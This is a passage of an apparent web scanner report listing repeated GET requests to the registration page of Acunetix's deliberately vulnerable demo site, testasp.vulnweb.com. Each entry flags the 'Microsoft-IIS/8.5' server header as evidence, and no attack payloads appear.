| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=33 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D33" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=34 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:58 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D34" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=35 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D35" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=36 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D36" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=37 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:59 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D37" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=38 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D38" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 368 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=39 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:53:00 GMT Content-Length: 3551 |
| Response Body - size: 3,551 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D39" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | Microsoft-IIS/8.5 |
| Request Header - size: 366 bytes. |
GET http://testasp.vulnweb.com/Register.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=4 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:50 GMT Content-Length: 3550 |
| Response Body - size: 3,550 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum register</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D4" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="post" enctype="application/x-www-form-urlencoded" name="frmRegister"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" id="tfUName" class="Login"></td> </tr> <tr> <td>Real name:</td> <td align="right"><input name="tfRName" type="text" id="tfRName" class="Login"></td> </tr> <tr> <td>Email:</td> <td align="right"><input name="tfEmail" type="text" id="tfEmail" class="Login"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" id="tfUPass" class="Login"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Register me"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life 